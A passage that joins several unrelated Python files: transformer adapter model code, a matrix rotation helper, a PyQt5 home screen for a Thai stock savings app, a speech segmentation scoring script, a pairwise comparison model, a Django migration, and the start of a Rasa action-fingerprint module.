        for layer_norm_1, attention, layer_norm_2, feed_forward in zip(self.layer_norms_1, self.attentions, self.layer_norms_2, self.feed_forwards):
            h = layer_norm_1(h)
            x, _ = attention(h, h, h, attn_mask=attn_mask, need_weights=False, key_padding_mask=padding_mask)
            x = self.dropout(x)
            h = x + h  # residual connection around attention
            h = layer_norm_2(h)
            x = feed_forward(h)
            x = self.dropout(x)
            h = x + h  # residual connection around the feed-forward block
        return h
class TransformerWithAdapters(Transformer):
    """Transformer whose layers carry bottleneck adapter blocks.

    Each layer gets two Linear->ReLU->Linear adapters (width
    ``adapters_dim``) applied residually: one after attention dropout, one
    after feed-forward dropout.  Everything else matches ``Transformer``.
    """
    def __init__(self, adapters_dim, embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal):
        """ Transformer with adapters (small bottleneck layers) """
        super().__init__(embed_dim, hidden_dim, num_embeddings, num_max_positions, num_heads, num_layers, dropout, causal)
        self.adapters_1 = nn.ModuleList()
        self.adapters_2 = nn.ModuleList()
        for _ in range(num_layers):
            self.adapters_1.append(nn.Sequential(nn.Linear(embed_dim, adapters_dim), nn.ReLU(), nn.Linear(adapters_dim, embed_dim)))
            self.adapters_2.append(nn.Sequential(nn.Linear(embed_dim, adapters_dim), nn.ReLU(), nn.Linear(adapters_dim, embed_dim)))
    def forward(self, x, padding_mask=None):
        """ x has shape [seq length, batch], padding_mask has shape [batch, seq length] """
        # Mirrors Transformer.forward, inserting one residual adapter after
        # each dropout so the adapter output adds onto the sub-layer output.
        positions = torch.arange(len(x), device=x.device).unsqueeze(-1)
        h = self.tokens_embeddings(x)
        h = h + self.position_embeddings(positions).expand_as(h)
        h = self.dropout(h)
        attn_mask = None
        if self.causal:
            # -inf above the diagonal: position i may not attend to j > i.
            attn_mask = torch.full((len(x), len(x)), -float('Inf'), device=h.device, dtype=h.dtype)
            attn_mask = torch.triu(attn_mask, diagonal=1)
        for layer_norm_1, attention, adapter_1, layer_norm_2, feed_forward, adapter_2 in zip(self.layer_norms_1, self.attentions, self.adapters_1, self.layer_norms_2, self.feed_forwards, self.adapters_2):
            h = layer_norm_1(h)
            x, _ = attention(h, h, h, attn_mask=attn_mask, need_weights=False, key_padding_mask=padding_mask)
            x = self.dropout(x)
            x = adapter_1(x) + x  # residual adapter on the attention path
            h = x + h
            h = layer_norm_2(h)
            x = feed_forward(h)
            x = self.dropout(x)
            x = adapter_2(x) + x  # residual adapter on the feed-forward path
            h = x + h
        return h
class TransformerWithClfHeadAndAdapters(nn.Module):
    """Transformer backbone plus a linear classification head.

    Uses ``TransformerWithAdapters`` when ``fine_tuning_config.adapters_dim``
    is positive, the plain ``Transformer`` otherwise.  The backbone is
    causal unless the pre-training objective was masked LM (``config.mlm``).
    """
    def __init__(self, config, fine_tuning_config):
        """ Transformer with a classification head and adapters. """
        super().__init__()
        self.config = fine_tuning_config
        if fine_tuning_config.adapters_dim > 0:
            self.transformer = TransformerWithAdapters(fine_tuning_config.adapters_dim, config.embed_dim, config.hidden_dim, config.num_embeddings, config.num_max_positions, config.num_heads, config.num_layers, fine_tuning_config.dropout, causal=not config.mlm)
        else:
            self.transformer = Transformer(config.embed_dim, config.hidden_dim, config.num_embeddings, config.num_max_positions, config.num_heads, config.num_layers, fine_tuning_config.dropout, causal=not config.mlm)
        self.classification_head = nn.Linear(config.embed_dim, fine_tuning_config.num_classes)
        self.apply(self.init_weights)
    def init_weights(self, module):
        # Normal(0, init_range) weights; zero biases where a bias exists.
        if isinstance(module, (nn.Linear, nn.Embedding, nn.LayerNorm)):
            module.weight.data.normal_(mean=0.0, std=self.config.init_range)
        if isinstance(module, (nn.Linear, nn.LayerNorm)) and module.bias is not None:
            module.bias.data.zero_()
    def forward(self, x, clf_tokens_mask, lm_labels=None, clf_labels=None, padding_mask=None):
        # NOTE(review): `lm_labels` is accepted but never used here -- confirm
        # whether a language-modelling loss was intended.
        hidden_states = self.transformer(x, padding_mask)
        # Sum the hidden states of the positions flagged by clf_tokens_mask
        # (sequence axis is dim 0) and classify the pooled vector.
        clf_tokens_states = (hidden_states * clf_tokens_mask.unsqueeze(-1).float()).sum(dim=0)
        clf_logits = self.classification_head(clf_tokens_states)
        if clf_labels is not None:
            loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
            loss = loss_fct(clf_logits.view(-1, clf_logits.size(-1)), clf_labels.view(-1))
            return clf_logits, loss
        return clf_logits
|
def rotate_a_matrix_by_90_degree(matrix):
    """Return *matrix* rotated 90 degrees clockwise.

    Works for any rectangular list-of-lists.  The original implementation
    indexed ``row[i]`` with ``i`` ranging over the number of rows, so it was
    only correct for square matrices (it raised IndexError or dropped
    columns on m x n input).  The input is not modified.

    >>> rotate_a_matrix_by_90_degree([[1, 2], [3, 4]])
    [[3, 1], [4, 2]]
    """
    # Reversing the row order and transposing is exactly a 90-degree
    # clockwise rotation.
    return [list(column) for column in zip(*reversed(matrix))]
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'home.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from StockData import Ui_StockData
from StockSearching import Ui_StockSearching
from StockCalc import Ui_StockCalc
class Ui_Home(object):
    """pyuic5-generated home screen with hand-added navigation wiring.

    setupUi() builds the dialog; the three centre buttons open the
    StockData / StockSearching / StockCalc windows, and Logout returns to
    the previous (login) window.
    """
    def setupUi(self, Home, prewindow):
        # `prewindow` is the window shown again when the user logs out.
        Home.setObjectName("Home")
        Home.resize(519, 510)
        Home.setStyleSheet("background-color: rgb(205, 219, 231);")
        # NOTE(review): y=510 places this label below the 510px-high dialog,
        # so it is currently invisible -- confirm the intended geometry.
        self.lblRealPrice = QtWidgets.QLabel(Home)
        self.lblRealPrice.setGeometry(QtCore.QRect(190, 510, 131, 21))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.lblRealPrice.setFont(font)
        self.lblRealPrice.setText("")
        self.lblRealPrice.setObjectName("lblRealPrice")
        # Bottom button: opens the savings-calculation window.
        self.pushButton = QtWidgets.QPushButton(Home)
        self.pushButton.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
        self.pushButton.setGeometry(QtCore.QRect(170, 300, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton.setFont(font)
        self.pushButton.setObjectName("pushButton")
        # Middle button: opens the stock-search window.
        self.pushButton_2 = QtWidgets.QPushButton(Home)
        self.pushButton_2.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
        self.pushButton_2.setGeometry(QtCore.QRect(170, 220, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton_2.setFont(font)
        self.pushButton_2.setObjectName("pushButton_2")
        # Top button: opens the stock-data window.
        self.pushButton_3 = QtWidgets.QPushButton(Home)
        self.pushButton_3.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;"
"color: rgb(105, 147, 184);")
        self.pushButton_3.setGeometry(QtCore.QRect(170, 140, 181, 61))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.pushButton_3.setFont(font)
        self.pushButton_3.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        self.pushButton_3.setObjectName("pushButton_3")
        # Flat "Logout" button in the bottom-left corner.
        self.btnLogout = QtWidgets.QPushButton(Home)
        self.btnLogout.setGeometry(QtCore.QRect(10, 480, 75, 23))
        self.btnLogout.setCheckable(False)
        self.btnLogout.setAutoRepeat(False)
        self.btnLogout.setAutoExclusive(False)
        self.btnLogout.setDefault(False)
        self.btnLogout.setFlat(True)
        self.btnLogout.setObjectName("btnLogout")
        self.btnLogout.setStyleSheet("color: rgb(105, 147, 184);")
        # NOTE(review): the fonts built for label_5 / lblUserName below are
        # never applied (no setFont call) and neither label gets any text --
        # confirm whether these widgets are still needed.
        self.label_5 = QtWidgets.QLabel(Home)
        self.label_5.setGeometry(QtCore.QRect(410, 20, 31, 21))
        font = QtGui.QFont()
        font.setPointSize(10)
        self.lblUserName = QtWidgets.QLabel(Home)
        self.lblUserName.setGeometry(QtCore.QRect(450, 20, 101, 21))
        font = QtGui.QFont()
        font.setPointSize(10)
        # Hand-added wiring: connect navigation buttons to their windows.
        self.pushButton_3.clicked.connect(self.showStockData)
        self.pushButton_2.clicked.connect(self.showStockSearch)
        self.pushButton.clicked.connect(self.showStockCalc)
        self.btnLogout.clicked.connect(self.logout)
        self.thiswindow = Home
        self.prewindow = prewindow
        self.retranslateUi(Home)
        QtCore.QMetaObject.connectSlotsByName(Home)
    def logout(self):
        # Hide this dialog and return to the previous (login) window.
        self.thiswindow.hide()
        self.prewindow.show()
    def showStockCalc(self):
        # Open the savings-calculation window and hide this one.
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockCalc()
        self.ui.setupUi(self.window,self.thiswindow)
        self.thiswindow.hide()
        self.window.show()
    def showStockSearch(self):
        # Open the stock-search window and hide this one.
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockSearching()
        self.ui.setupUi(self.window,self.thiswindow)
        self.thiswindow.hide()
        self.window.show()
    def showStockData(self):
        # Open the stock-data window and hide this one.
        self.window = QtWidgets.QMainWindow()
        self.ui = Ui_StockData()
        self.ui.setupUi(self.window,self.thiswindow)
        self.thiswindow.hide()
        self.window.show()
    def retranslateUi(self, Home):
        # Apply the translated (Thai) captions to the window and buttons.
        _translate = QtCore.QCoreApplication.translate
        Home.setWindowTitle(_translate("Home", "โปรแกรมคำนวณเงินออมสะสมหุ้น"))
        self.pushButton.setText(_translate("Home", "คำนวณรายการออมหุ้น"))
        self.pushButton_2.setText(_translate("Home", "ค้นหารายชื่อหุ้นที่ทำรายการ"))
        self.pushButton_3.setText(_translate("Home", "เพิ่มรายการหุ้นจดทะเบียน"))
        self.btnLogout.setText(_translate("Home", "Logout"))
if __name__ == "__main__":
    # Standalone entry point for previewing the home dialog.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    Home = QtWidgets.QDialog()
    ui = Ui_Home()
    # BUG FIX: setupUi() requires a `prewindow` argument; calling it with
    # only the dialog raised TypeError.  A standalone run has no previous
    # window, so pass None (Logout then has nothing to return to).
    ui.setupUi(Home, None)
    Home.show()
    sys.exit(app.exec_())
|
#!/usr/bin/python
import argparse, sys, os, glob
import numpy as np
from argparse import ArgumentParser
frame_shift = 0.01  # seconds per frame; converts frame counts to durations
def mean(x):
    """Return the arithmetic mean of *x* as a float, or 0 if *x* is empty.

    The original caught bare ``Exception``, which would also silently hide
    genuine bugs (e.g. non-numeric elements); only the empty-sequence case
    is expected here, so catch exactly that.
    """
    try:
        return float(sum(x))/len(x)
    except ZeroDivisionError:
        return 0
class Analysis:
    """Frame-level confusion statistics between reference and predicted
    labels (0 = silence, 1 = noise, 2 = speech).

    ``state_count`` and ``markers`` are indexed by the 9 (ref, pred)
    combinations in row-major order: 0 sil->sil, 1 sil->noise,
    2 sil->speech, 3 noise->sil, 4 noise->noise, 5 noise->speech,
    6 speech->sil, 7 speech->noise, 8 speech->speech.
    """
    def __init__(self, options = None):
        # NOTE(review): the default options=None would crash on the
        # attribute reads below; callers always pass a parsed-args object.
        self.sil_as_sil = 0
        self.sil_as_noise = 0
        self.sil_as_speech = 0
        self.noise_as_sil = 0
        self.noise_as_noise = 0
        self.noise_as_speech = 0
        self.speech_as_sil = 0
        self.speech_as_noise = 0
        self.speech_as_speech = 0
        # Per-state segment lengths (in frames) and segment start frames.
        self.state_count = [ [] for i in range(0,9) ]
        self.markers = [ [] for i in range(0,9) ]
        # Per-state length summaries, filled lazily by write().
        self.min_length = [0] * 9
        self.max_length = [0] * 9
        self.mean_length = [0] * 9
        self.percentile25 = [0] * 9
        self.percentile50 = [0] * 9
        self.percentile75 = [0] * 9
        self.write_length_stats = options.write_length_stats
        self.write_markers = options.write_markers
    def write(self, file_handle = sys.stdout):
        """Print totals, the confusion breakdown and (optionally) segment
        length statistics / start markers.  compute_stats() must have been
        called first to populate the true_*/predicted_* totals."""
        # Durations in hours: frame count * frame_shift seconds / 3600.
        file_handle.write("%20s: %2.3f hrs\n" % ("True Silence", float(self.true_silence)*frame_shift/60/60))
        file_handle.write("%20s: %2.3f hrs\n" % ("True Noise", float(self.true_noise)*frame_shift/60/60))
        file_handle.write("%20s: %2.3f hrs\n" % ("True Speech", float(self.true_speech)*frame_shift/60/60))
        file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Silence", float(self.predicted_silence)*frame_shift/60/60))
        file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Noise", float(self.predicted_noise)*frame_shift/60/60))
        file_handle.write("%20s: %2.3f hrs\n" % ("Predicted Speech", float(self.predicted_speech)*frame_shift/60/60))
        # Per-class breakdown, with row percentages of the true class.
        if self.true_silence != 0:
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Silence", self.sil_as_sil , float(self.sil_as_sil *100)/ self.true_silence ))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Noise", self.sil_as_noise , float(self.sil_as_noise *100)/ self.true_silence ))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Silence classified as Speech", self.sil_as_speech , float(self.sil_as_speech *100)/ self.true_silence ))
        if self.true_noise != 0:
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Silence", self.noise_as_sil , float(self.noise_as_sil *100)/ self.true_noise ))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Noise", self.noise_as_noise , float(self.noise_as_noise *100)/ self.true_noise ))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Noise classified as Speech", self.noise_as_speech , float(self.noise_as_speech *100)/ self.true_noise ))
        if self.true_speech != 0:
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Silence", self.speech_as_sil , float(self.speech_as_sil *100)/self.true_speech))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Noise", self.speech_as_noise , float(self.speech_as_noise *100)/self.true_speech))
            file_handle.write("%40s: %10d (%2.3f)\n" % ("Speech classified as Speech", self.speech_as_speech , float(self.speech_as_speech*100)/self.true_speech))
        if self.write_length_stats:
            # Summarise the segment-length distribution for each of the 9
            # states; empty lists fall back to the sentinel defaults.
            for i in range(0,9):
                self.max_length[i] = max([0]+self.state_count[i])
                self.min_length[i] = min([10000]+self.state_count[i])
                self.mean_length[i] = mean(self.state_count[i])
                try:
                    self.percentile25[i] = np.percentile(self.state_count[i], 25)
                except ValueError:
                    self.percentile25[i] = 0
                try:
                    self.percentile50[i] = np.percentile(self.state_count[i], 50)
                except ValueError:
                    self.percentile50[i] = 0
                try:
                    self.percentile75[i] = np.percentile(self.state_count[i], 75)
                except ValueError:
                    self.percentile75[i] = 0
            file_handle.write("Lengths of different segments:\n")
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Silence", str(self.state_count[0]) ))
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Noise", str(self.state_count[1]) ))
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Speech", str(self.state_count[2]) ))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Silence", str(self.state_count[3]) ))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Noise", str(self.state_count[4]) ))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Speech", str(self.state_count[5]) ))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Silence", str(self.state_count[6]) ))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Noise", str(self.state_count[7]) ))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Speech", str(self.state_count[8]) ))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Silence", self.min_length[0], self.max_length[0], self.mean_length[0], self.percentile25[0], self.percentile50[0], self.percentile75[0]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Noise", self.min_length[1], self.max_length[1], self.mean_length[1], self.percentile25[1], self.percentile50[1], self.percentile75[1]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Silence classified as Speech", self.min_length[2], self.max_length[2], self.mean_length[2], self.percentile25[2], self.percentile50[2], self.percentile75[2]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Silence", self.min_length[3], self.max_length[3], self.mean_length[3], self.percentile25[3], self.percentile50[3], self.percentile75[3]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Noise", self.min_length[4], self.max_length[4], self.mean_length[4], self.percentile25[4], self.percentile50[4], self.percentile75[4]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Noise classified as Speech", self.min_length[5], self.max_length[5], self.mean_length[5], self.percentile25[5], self.percentile50[5], self.percentile75[5]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Silence", self.min_length[6], self.max_length[6], self.mean_length[6], self.percentile25[6], self.percentile50[6], self.percentile75[6]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Noise", self.min_length[7], self.max_length[7], self.mean_length[7], self.percentile25[7], self.percentile50[7], self.percentile75[7]))
            file_handle.write("%40s: Min: %4d Max: %4d Mean: %4d percentile25: %4d percentile50: %4d percentile75: %4d\n" % ("Speech classified as Speech", self.min_length[8], self.max_length[8], self.mean_length[8], self.percentile25[8], self.percentile50[8], self.percentile75[8]))
        if self.write_markers:
            # For each state, print "start_frame (length)" for every segment.
            file_handle.write("Start frames of different segments:\n")
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Silence", str([str(self.markers[0][i])+' ('+ str(self.state_count[0][i])+')' for i in range(0, len(self.state_count[0]))])))
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Noise", str([str(self.markers[1][i])+' ('+ str(self.state_count[1][i])+')' for i in range(0, len(self.state_count[1]))])))
            file_handle.write("%40s:\n %s\n" % ("Silence classified as Speech", str([str(self.markers[2][i])+' ('+ str(self.state_count[2][i])+')' for i in range(0, len(self.state_count[2]))])))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Silence", str([str(self.markers[3][i])+' ('+ str(self.state_count[3][i])+')' for i in range(0, len(self.state_count[3]))])))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Noise", str([str(self.markers[4][i])+' ('+ str(self.state_count[4][i])+')' for i in range(0, len(self.state_count[4]))])))
            file_handle.write("%40s:\n %s\n" % ("Noise classified as Speech", str([str(self.markers[5][i])+' ('+ str(self.state_count[5][i])+')' for i in range(0, len(self.state_count[5]))])))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Silence", str([str(self.markers[6][i])+' ('+ str(self.state_count[6][i])+')' for i in range(0, len(self.state_count[6]))])))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Noise", str([str(self.markers[7][i])+' ('+ str(self.state_count[7][i])+')' for i in range(0, len(self.state_count[7]))])))
            file_handle.write("%40s:\n %s\n" % ("Speech classified as Speech", str([str(self.markers[8][i])+' ('+ str(self.state_count[8][i])+')' for i in range(0, len(self.state_count[8]))])))
    def compute_stats(self):
        """Derive per-class totals (row sums = true, column sums = predicted)
        from the nine confusion counters."""
        self.true_silence = self.sil_as_sil + self.sil_as_noise + self.sil_as_speech
        self.true_noise = self.noise_as_sil + self.noise_as_noise + self.noise_as_speech
        self.true_speech = self.speech_as_sil + self.speech_as_noise + self.speech_as_speech
        self.predicted_silence = self.sil_as_sil + self.noise_as_sil + self.speech_as_sil
        self.predicted_noise = self.sil_as_noise + self.noise_as_noise + self.speech_as_noise
        self.predicted_speech = self.sil_as_speech + self.noise_as_speech + self.speech_as_speech
def main():
    """Compare per-frame .pred files against .ref files and print per-file
    and overall confusion statistics (labels: 0 silence, 1 noise, 2 speech).

    Each file's first whitespace-separated token is an utterance id and is
    skipped ([1:]); the remaining tokens are one label per frame.
    """
    parser = ArgumentParser(description='Analyse segmentation using force alignment data')
    parser.add_argument('-l','--print-length-stats', dest='write_length_stats', action='store_true', help='Print length of the difference classes')
    parser.add_argument('-m','--print-start-markers', dest='write_markers', action='store_true', help='Print start markers of the difference classes')
    parser.add_argument('args', nargs=2, help='<reference_dir> <prediction_dir>')
    options = parser.parse_args()
    reference_dir = options.args[0]
    prediction_dir = options.args[1]
    # Map basenames (extension stripped) to empty lists; only the key sets
    # are actually used below.
    reference = dict([ (f.split('/')[-1][0:-4], []) for f in glob.glob(reference_dir + "/*.ref") ])
    prediction = dict([ (f.split('/')[-1][0:-5], []) for f in glob.glob(prediction_dir + "/*.pred") ])
    per_file_diff = {}
    # Global accumulator across all files; markers are only tracked per-file.
    frame_diff = Analysis(options)
    frame_diff.write_markers = False
    for file_id in prediction:
        try:
            this_pred = open(prediction_dir+"/"+file_id+".pred").readline().strip().split()[1:]
        except IOError:
            sys.stderr.write("Unable to open " + prediction_dir+"/"+file_id+".pred\tSkipping utterance\n")
            continue
        if file_id not in reference:
            sys.stderr.write(reference_dir+"/"+file_id+".ref not found\tSkipping utterance\n")
            continue
        try:
            this_ref = open(reference_dir+"/"+file_id+".ref").readline().strip().split()[1:]
        except IOError:
            sys.stderr.write("Unable to open " + reference_dir+"/"+file_id+".ref\tSkipping utterance\n")
            continue
        this_frame_diff = Analysis(options)
        # Pad the shorter sequence with "0" (silence) so both align.
        this_len = len(this_pred)
        if len(this_ref) > this_len:
            this_pred.extend(["0"]*(len(this_ref) - this_len))
            this_len = len(this_ref)
        elif len(this_ref) < this_len:
            this_ref.extend(["0"]*(this_len - len(this_ref)))
            this_len = len(this_ref)
        # Run-length state machine over the 9 (ref, pred) combinations.
        count = 0
        prev_state = None
        for i in range(0, this_len):
            ref = this_ref[i]
            pred = this_pred[i]
            if ref == "0" and pred == "0":
                frame_diff.sil_as_sil += 1
                this_frame_diff.sil_as_sil += 1
                state = 0
            elif ref == "0" and pred == "1":
                frame_diff.sil_as_noise += 1
                this_frame_diff.sil_as_noise += 1
                state = 1
            elif ref == "0" and pred == "2":
                frame_diff.sil_as_speech += 1
                this_frame_diff.sil_as_speech += 1
                state = 2
            elif ref == "1" and pred == "0":
                frame_diff.noise_as_sil += 1
                this_frame_diff.noise_as_sil += 1
                state = 3
            elif ref == "1" and pred == "1":
                frame_diff.noise_as_noise += 1
                this_frame_diff.noise_as_noise += 1
                state = 4
            elif ref == "1" and pred == "2":
                frame_diff.noise_as_speech += 1
                this_frame_diff.noise_as_speech += 1
                state = 5
            elif ref == "2" and pred == "0":
                frame_diff.speech_as_sil += 1
                this_frame_diff.speech_as_sil += 1
                state = 6
            elif ref == "2" and pred == "1":
                frame_diff.speech_as_noise += 1
                this_frame_diff.speech_as_noise += 1
                state = 7
            elif ref == "2" and pred == "2":
                frame_diff.speech_as_speech += 1
                this_frame_diff.speech_as_speech += 1
                state = 8
            # On a state change, flush the finished run's length and start.
            # NOTE(review): the final run of each file is never flushed
            # (there is no flush after the loop) -- confirm if intended.
            if prev_state != state:
                if count > 0:
                    this_frame_diff.state_count[prev_state].append(count)
                    frame_diff.state_count[prev_state].append(count)
                    this_frame_diff.markers[prev_state].append(i-count)
                count = 1
                prev_state = state
            else:
                count += 1
        sys.stdout.write("\n"+file_id+"\n")
        this_frame_diff.compute_stats()
        this_frame_diff.write()
    sys.stdout.write("\nTOTAL\n")
    frame_diff.compute_stats()
    frame_diff.write()
if __name__ == '__main__':
    main()
|
from numpy import *
'''
Model for pairwise comparisons
'''
class pairwise:
    """Pairwise-comparison model over ``self.n`` items.

    ``P[i, j]`` is the probability that item i beats item j, so
    ``P[i, j] + P[j, i] = 1`` and ``P[i, i] = 0.5``.  After generation the
    matrix is sorted so higher-scoring items come first.
    """
    def __init__(self, n):
        self.ctr = 0  # counts how many comparisons have been queried
        self.n = n

    def random_uniform(self):
        """Generate a random comparison matrix with off-diagonal entries
        uniform in [0, 0.9] made consistent (P[i,j] = 1 - P[j,i]).

        BUG FIX: the loops previously iterated over the undefined global
        ``n`` instead of ``self.n``, which raised NameError.
        """
        self.P = random.rand(self.n, self.n)*0.9
        for i in range(self.n):
            self.P[i, i] = 0.5
        for i in range(self.n):
            for j in range(i+1, self.n):
                self.P[i, j] = 1 - self.P[j, i]
        self.sortP()

    def sortP(self):
        """Reorder rows and columns of P by descending score."""
        scores = self.scores()
        pi = argsort(-scores)
        self.P = self.P[:, pi]
        self.P = self.P[pi, :]

    def generate_BTL(self, sdev=1):
        """Draw Bradley-Terry-Luce preferences from Gaussian skills."""
        self.P = zeros((self.n, self.n))
        # Gaussian seems reasonable; if we choose it more extreme, e.g.,
        # like Gaussian^2, it looks very different from the real-world
        # distributions.
        w = sdev*random.randn(self.n)
        self.w = w
        # w = w - min(w) does not matter
        for i in range(self.n):
            for j in range(i, self.n):
                self.P[i, j] = 1/( 1 + exp( w[j] - w[i] ) )
                self.P[j, i] = 1 - self.P[i, j]
        self.sortP()

    def uniform_perturb(self, sdev=0.01):
        """Add bounded uniform noise to P, keeping it consistent and in (0,1)."""
        for i in range(self.n):
            for j in range(i, self.n):
                perturbed_entry = self.P[i, j] + sdev*(random.rand()-0.5)
                if perturbed_entry > 0 and perturbed_entry < 1:
                    self.P[i, j] = perturbed_entry
                    self.P[j, i] = 1-perturbed_entry

    def generate_deterministic_BTL(self, w):
        """Build BTL preferences from a given skill vector ``w``."""
        self.w = w
        self.P = zeros((self.n, self.n))
        for i in range(self.n):
            for j in range(i, self.n):
                self.P[i, j] = 1/( 1 + exp( w[j] - w[i] ) )
                self.P[j, i] = 1 - self.P[i, j]
        self.sortP()

    def generate_const(self, pmin=0.25):
        """Constant-gap model: every higher-ranked item wins w.p. 1 - pmin."""
        self.P = zeros((self.n, self.n))
        for i in range(self.n):
            for j in range(i+1, self.n):
                self.P[i, j] = 1 - pmin
                self.P[j, i] = pmin

    def compare(self, i, j):
        """Query one stochastic comparison of items i and j."""
        self.ctr += 1
        if random.rand() < self.P[i, j]:
            return 1  # i beats j
        else:
            return 0  # j beats i

    def scores(self):
        """Borda-style score: mean win probability against the other items."""
        P = array(self.P)  # copy so zeroing the diagonal leaves self.P intact
        for i in range(len(P)):
            P[i, i] = 0
        return sum(P, axis=1)/(self.n-1)

    def plot_scores(self):
        # NOTE(review): `plt` is not imported anywhere in this module;
        # calling this requires `import matplotlib.pyplot as plt`.
        plt.plot(range(self.n), self.scores(), 'ro')
        plt.show()

    def top1H(self):
        """Hardness measure for top-1 identification from score gaps.

        BUG FIX: the sum previously used sc[1] in every term (compare
        top1parH, which varies the index); it now uses sc[i].
        """
        sc = self.scores()
        return 1/(sc[0]-sc[1])**2 + sum([ 1/(sc[0]-sc[i])**2 for i in range(1,self.n)])

    def top1parH(self):
        """Parametric (BTL) analogue of top1H using the skill vector w."""
        sc = self.scores()
        w = sorted(self.w, reverse=True)
        return (( exp(w[0])-exp(w[1]) )/( exp(w[0])+exp(w[1]) ))**-2 + sum([ (( exp(w[0])-exp(w[i]) )/( exp(w[0])+exp(w[i]) ))**-2 for i in range(1,self.n)])
|
# Generated by Django 3.2 on 2021-06-13 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the many-to-many field `manyfield` (Book -> loginAPI.Users)."""
    # Must be applied after 0012_book_brand_one.
    dependencies = [
        ('loginAPI', '0012_book_brand_one'),
    ]
    operations = [
        migrations.AddField(
            model_name='book',
            name='manyfield',
            field=models.ManyToManyField(related_name='many', to='loginAPI.Users'),
        ),
    ]
|
import dataclasses
from typing import DefaultDict, Dict, List, Optional, Set, Text, TYPE_CHECKING
from collections import defaultdict
from rasa.shared.core.events import ActionExecuted, UserUttered
from rasa.shared.core.events import SlotSet, ActiveLoop
if TYPE_CHECKING:
from rasa.shared.core.domain import Domain
from rasa.shared.core.trackers import DialogueStateTracker
from rasa.shared.core.events import Event
@dataclasses.dataclass
class ActionFingerprint:
    """Dataclass to represent an action fingerprint."""
    # Names of the featurized slots this action set during training.
    slots: List[Text]
    # Names of the loops observed active after this action during training.
    active_loop: List[Optional[Text]]
def _find_events_after_actions(
trackers: List["DialogueStateTracker"],
) -> DefaultDict[Text, Set["Event"]]:
"""Creates a mapping of action names / texts and events that follow these actions.
Args:
trackers: the list of trackers
Returns:
A mapping of action names / texts and events that follow these actions.
"""
events_after_actions = defaultdict(set)
for tracker in trackers:
action_name = None
for event in tracker.events:
if isinstance(event, ActionExecuted):
action_name = event.action_name or event.action_text
continue
if isinstance(event, UserUttered):
# UserUttered can contain entities that might set some slots, reset
# action_name so that these slots are not attributed to action_listen
action_name = None
continue
if action_name:
events_after_actions[action_name].add(event)
return events_after_actions
def create_action_fingerprints(
    trackers: List["DialogueStateTracker"], domain: "Domain"
) -> Dict[Text, ActionFingerprint]:
    """Fingerprint each action using the events it created during training.

    The fingerprints let us warn at inference time when an action does
    something it never did during training, or when rules are incomplete.

    Args:
        trackers: the list of trackers.
        domain: the domain.

    Returns:
        A mapping from action name to the slots and active loops that
        action set during training.
    """
    events_by_action = _find_events_after_actions(trackers)
    if not events_by_action:
        return {}
    # Only featurized slots matter for prediction, so ignore the rest.
    featurized_slots = {slot.name for slot in domain.slots if slot.has_features()}
    fingerprints: Dict[Text, ActionFingerprint] = {}
    for action_name, events in events_by_action.items():
